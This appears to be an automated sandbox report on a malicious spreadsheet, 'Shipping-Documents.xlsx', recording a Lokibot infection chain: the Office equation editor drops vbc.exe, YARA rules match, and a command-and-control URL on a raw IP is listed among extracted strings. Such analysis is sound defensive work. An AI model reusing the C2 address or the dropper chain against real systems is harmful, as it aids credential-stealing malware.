74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2

Source: vbc.exe, 00000005.00000002.2182254082.00000000008D4000.00000004.00000020.sdmp	String found in binary or memory: http://63.141.228.141/32.php/S4wFP8QBww9Tp
Source: vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2170728064.0000000002361000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: A6AB76E0.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, vbc.exe, 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: vbc.exe	String found in binary or memory: https://github.com/georgw777/
Source: vbc.exe	String found in binary or memory: https://github.com/georgw777/MediaManager
Source: vbc.exe, 00000004.00000000.2161017267.0000000000D02000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2168355610.0000000000D02000.00000020.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: https://github.com/georgw777/MediaManager;https://github.com/georgw777/
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E90E1	4_2_002E90E1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EC3D0	4_2_002EC3D0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EBB78	4_2_002EBB78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EDDA8	4_2_002EDDA8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002ECE76	4_2_002ECE76
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E555A	4_2_002E555A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EF8D8	4_2_002EF8D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EBA83	4_2_002EBA83
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EBAD0	4_2_002EBAD0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EED48	4_2_002EED48
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E2D80	4_2_002E2D80
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E4F60	4_2_002E4F60
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EAFB2	4_2_002EAFB2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00615819	4_2_00615819
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00610048	4_2_00610048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00615CE0	4_2_00615CE0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006148C4	4_2_006148C4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00616080	4_2_00616080
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00610548	4_2_00610548
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00610538	4_2_00610538
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00610270	4_2_00610270
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00616650	4_2_00616650
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00613658	4_2_00613658
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006112A8	4_2_006112A8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00610280	4_2_00610280
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00610728	4_2_00610728
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040549C	5_2_0040549C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004029D4	5_2_004029D4

Source: Shipping-Documents.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\Public\vbc.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Users\Public\vbc.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research

Source: regasm[1].exe.2.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: regasm[1].exe.2.dr, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'CreateDecryptor'
Source: regasm[1].exe.2.dr, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vbc.exe.d00000.3.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.d00000.3.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.vbc.exe.d00000.1.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.d00000.1.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/20@0/2

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

5_2_0040650A

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

5_2_0040434D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Shipping-Documents.xlsx

Jump to behavior

Source: C:\Users\Public\vbc.exe

Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRFAD2.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: Shipping-Documents.xlsx	Virustotal: Detection: 40%
Source: Shipping-Documents.xlsx	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Shipping-Documents.xlsx

Static file information: File size 1359872 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: StringBuilderCache.pdb source: vbc.exe, vbc.exe.2.dr

Source: Shipping-Documents.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Shipping-Documents.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected aPLib compressed binary

Show sources

Source: Yara match	File source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00D03CE4 push es; ret	4_2_00D03CE7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00D03BE1 push es; retn 0000h	4_2_00D03BEF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0061885F push esp; retf 0017h	4_2_00618860
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00612433 pushad ; retf	4_2_00612435
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006120C2 push ss; iretd	4_2_006120C5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006120CC push ss; iretd	4_2_006120CF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0061318B push ebp; retf	4_2_0061318D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006162FD push es; retf	4_2_006162FE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006147A5 push eax; retf 0017h	4_2_006147B1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402AC0 push eax; ret	5_2_00402AD4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402AC0 push eax; ret	5_2_00402AFC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00D03CE4 push es; ret	5_2_00D03CE7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00D03BE1 push es; retn 0000h	5_2_00D03BEF

Source: initial sample

Static PE information: section name: .text entropy: 7.61248422498

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
